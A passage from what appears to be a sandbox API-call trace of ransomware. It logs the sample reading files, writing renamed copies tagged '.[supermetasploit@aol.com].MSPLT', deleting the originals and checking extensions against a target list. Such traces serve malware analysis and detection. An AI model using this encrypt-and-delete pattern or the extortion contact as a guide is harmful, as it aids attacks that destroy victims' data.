lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x2790, lpOverlapped=0x0) returned 1 [0170.805] ReadFile (in: hFile=0x2ec, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0170.805] WriteFile (in: hFile=0x2f8, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0170.805] SetEndOfFile (hFile=0x2f8) returned 1 [0170.805] CloseHandle (hObject=0x2f8) returned 1 [0170.806] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0170.806] SetEndOfFile (hFile=0x2ec) returned 1 [0170.807] CloseHandle (hObject=0x2ec) returned 1 [0170.807] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.808] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 1 [0170.808] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.808] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.808] lstrlenW (lpString=".doc") returned 4 [0170.808] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.808] lstrlenW (lpString=".docx") returned 5 [0170.808] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.808] lstrlenW (lpString=".pdf") returned 4 [0170.808] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.808] lstrlenW (lpString=".xls") returned 4 [0170.808] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.808] lstrlenW (lpString=".xlsx") returned 5 [0170.809] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.809] lstrlenW (lpString=".ppt") returned 4 [0170.809] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.809] lstrlenW (lpString=".zip") returned 4 [0170.809] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.809] lstrlenW (lpString=".rar") returned 4 [0170.809] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.809] lstrlenW (lpString=".bz2") returned 4 [0170.809] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.809] lstrlenW (lpString=".7z") returned 3 [0170.809] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.809] lstrlenW (lpString=".dbf") returned 4 [0170.809] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.809] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.809] lstrlenW (lpString=".1cd") returned 4 [0170.809] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.810] lstrlenW (lpString=".jpg") returned 4 [0170.810] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.810] lstrlenW (lpString=".doc") returned 4 [0170.810] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString=".docx") returned 5 [0170.810] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.810] lstrlenW (lpString=".pdf") returned 4 [0170.810] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString=".xls") returned 4 [0170.810] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.810] lstrlenW (lpString=".xlsx") returned 5 [0170.810] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.810] lstrlenW (lpString=".ppt") returned 4 [0170.810] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.810] lstrlenW (lpString=".zip") returned 4 [0170.810] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.810] lstrlenW (lpString=".rar") returned 4 [0170.810] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString=".bz2") returned 4 [0170.810] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.810] lstrlenW (lpString=".7z") returned 3 [0170.811] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.811] lstrlenW (lpString=".dbf") returned 4 [0170.811] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.811] lstrlenW (lpString=".1cd") returned 4 [0170.811] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0170.811] lstrlenW (lpString=".jpg") returned 4 [0170.811] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.811] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0170.811] lstrlenW (lpString="LocalizedData.xml") returned 17 [0170.811] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0171.104] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=65238) returned 1 [0171.104] CloseHandle (hObject=0x348) returned 1 [0171.104] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 0x80 [0171.104] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.104] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0171.105] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.105] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.105] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0171.105] GetLastError () returned 0x0 [0171.105] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xfed6, lpOverlapped=0x0) returned 1 [0171.187] WriteFile (in: hFile=0x34c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xfee0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xfee0, lpOverlapped=0x0) returned 1 [0171.189] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0171.189] WriteFile (in: hFile=0x34c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.190] SetEndOfFile (hFile=0x34c) returned 1 [0171.190] CloseHandle (hObject=0x34c) returned 1 [0171.193] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.193] SetEndOfFile (hFile=0x348) returned 1 [0171.194] CloseHandle (hObject=0x348) returned 1 [0171.194] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.195] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 1 [0171.195] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.195] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.195] lstrlenW (lpString=".doc") returned 4 [0171.195] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.195] lstrlenW (lpString=".docx") returned 5 [0171.195] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.195] lstrlenW (lpString=".pdf") returned 4 [0171.195] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.195] lstrlenW (lpString=".xls") returned 4 [0171.195] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.195] lstrlenW (lpString=".xlsx") returned 5 [0171.196] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.196] lstrlenW (lpString=".ppt") returned 4 [0171.196] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.196] lstrlenW (lpString=".zip") returned 4 [0171.196] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.196] lstrlenW (lpString=".rar") returned 4 [0171.196] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString=".bz2") returned 4 [0171.196] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString=".7z") returned 3 [0171.196] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.196] lstrlenW (lpString=".dbf") returned 4 [0171.196] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.196] lstrlenW (lpString=".1cd") returned 4 [0171.196] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.196] lstrlenW (lpString=".jpg") returned 4 [0171.196] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.196] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.196] lstrlenW (lpString=".doc") returned 4 [0171.196] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.196] lstrlenW (lpString=".docx") returned 5 [0171.196] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.197] lstrlenW (lpString=".pdf") returned 4 [0171.197] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.197] lstrlenW (lpString=".xls") returned 4 [0171.197] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.197] lstrlenW (lpString=".xlsx") returned 5 [0171.197] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.197] lstrlenW (lpString=".ppt") returned 4 [0171.197] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.258] lstrlenW (lpString=".zip") returned 4 [0171.258] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.258] lstrlenW (lpString=".rar") returned 4 [0171.258] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.258] lstrlenW (lpString=".bz2") returned 4 [0171.258] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.258] lstrlenW (lpString=".7z") returned 3 [0171.258] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.258] lstrlenW (lpString=".dbf") returned 4 [0171.258] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.258] lstrlenW (lpString=".1cd") returned 4 [0171.258] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.259] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0171.259] lstrlenW (lpString=".jpg") returned 4 [0171.259] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.259] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.259] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.259] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0171.313] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=79296) returned 1 [0171.313] CloseHandle (hObject=0x360) returned 1 [0171.314] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 0x80 [0171.314] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.314] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0171.314] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.314] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.315] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0171.315] GetLastError () returned 0x0 [0171.315] ReadFile (in: hFile=0x360, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x135c0, lpOverlapped=0x0) returned 1 [0171.327] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x135d0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x135d0, lpOverlapped=0x0) returned 1 [0171.330] ReadFile (in: hFile=0x360, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0171.330] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.330] SetEndOfFile (hFile=0x354) returned 1 [0171.330] CloseHandle (hObject=0x354) returned 1 [0171.334] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.334] SetEndOfFile (hFile=0x360) returned 1 [0171.336] CloseHandle (hObject=0x360) returned 1 [0171.336] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.336] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 1 [0171.337] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.337] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.337] lstrlenW (lpString=".doc") returned 4 [0171.337] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.337] lstrlenW (lpString=".docx") returned 5 [0171.337] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.337] lstrlenW (lpString=".pdf") returned 4 [0171.337] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.337] lstrlenW (lpString=".xls") returned 4 [0171.337] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.337] lstrlenW (lpString=".xlsx") returned 5 [0171.337] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.337] lstrlenW (lpString=".ppt") returned 4 [0171.337] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.337] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.337] lstrlenW (lpString=".zip") returned 4 [0171.337] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.337] lstrlenW (lpString=".rar") returned 4 [0171.337] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString=".bz2") returned 4 [0171.338] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString=".7z") returned 3 [0171.338] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.338] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.338] lstrlenW (lpString=".dbf") returned 4 [0171.338] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.338] lstrlenW (lpString=".1cd") returned 4 [0171.338] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.338] lstrlenW (lpString=".jpg") returned 4 [0171.338] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.338] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.338] lstrlenW (lpString=".doc") returned 4 [0171.338] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString=".docx") returned 5 [0171.338] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.338] lstrlenW (lpString=".pdf") returned 4 [0171.338] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.338] lstrlenW (lpString=".xls") returned 4 [0171.339] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.339] lstrlenW (lpString=".xlsx") returned 5 [0171.339] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.339] lstrlenW (lpString=".ppt") returned 4 [0171.339] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.339] lstrlenW (lpString=".zip") returned 4 [0171.339] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.339] lstrlenW (lpString=".rar") returned 4 [0171.339] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.339] lstrlenW (lpString=".bz2") returned 4 [0171.339] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.339] lstrlenW (lpString=".7z") returned 3 [0171.339] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.339] lstrlenW (lpString=".dbf") returned 4 [0171.339] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.339] lstrlenW (lpString=".1cd") returned 4 [0171.339] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0171.339] lstrlenW (lpString=".jpg") returned 4 [0171.339] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.439] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.439] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.439] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0171.448] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=80738) returned 1 [0171.448] CloseHandle (hObject=0x364) returned 1 [0171.448] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 0x80 [0171.448] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.449] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0171.449] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.449] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.449] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0171.449] GetLastError () returned 0x0 [0171.449] ReadFile (in: hFile=0x364, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x13b62, lpOverlapped=0x0) returned 1 [0171.622] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13b70, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13b70, lpOverlapped=0x0) returned 1 [0171.625] ReadFile (in: hFile=0x364, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0171.625] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.626] SetEndOfFile (hFile=0x368) returned 1 [0171.626] CloseHandle (hObject=0x368) returned 1 [0171.632] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.632] SetEndOfFile (hFile=0x364) returned 1 [0171.634] CloseHandle (hObject=0x364) returned 1 [0171.634] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.634] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 1 [0171.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.635] lstrlenW (lpString=".doc") returned 4 [0171.635] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.635] lstrlenW (lpString=".docx") returned 5 [0171.635] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.635] lstrlenW (lpString=".pdf") returned 4 [0171.635] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.635] lstrlenW (lpString=".xls") returned 4 [0171.635] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.635] lstrlenW (lpString=".xlsx") returned 5 [0171.635] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.635] lstrlenW (lpString=".ppt") returned 4 [0171.635] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.635] lstrlenW (lpString=".zip") returned 4 [0171.635] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.635] lstrlenW (lpString=".rar") returned 4 [0171.635] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString=".bz2") returned 4 [0171.636] lstrcmpiW 